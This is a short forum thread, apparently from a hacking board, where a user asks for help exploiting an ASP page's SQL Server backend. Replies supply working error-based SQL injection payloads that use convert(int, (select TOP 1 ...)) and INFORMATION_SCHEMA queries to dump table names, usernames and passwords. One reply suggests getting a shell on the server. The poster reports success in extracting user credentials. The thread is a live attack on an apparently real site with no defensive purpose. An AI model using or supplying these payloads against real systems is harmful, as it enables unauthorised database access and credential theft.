![]() |
help !! sql+asp
hey../
Ask our inquiry last sql asp Show me this talk Look Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC SQL Server Driver][SQL Server]Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression. /AR/Main/Calendar_CheckMonth.asp, line 130 It is user: convert(int,+(select+UserName+from+Users));-- What can I do? :confused: :confused: :confused: |
convert(int+(select+UserName+from+pass));--
there are tables (User etc or try namr db UserName etc) what chek Try to throw Shell on a server, if I have correctly understood you. |
Я по аглицки писать не умею, но попробую
Use "TOP 1" in your Select query Example: id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES) try: convert(int,+(select+TOP 1+UserName+from+Users));-- Then, using a construction: "where..not in " |
thanx Sn@k3 ,Scipio
It is user: convert(int,+(select+TOP 1+UserName+from+Users));-- Noon me user and password ^_^ |
| Время: 12:23 |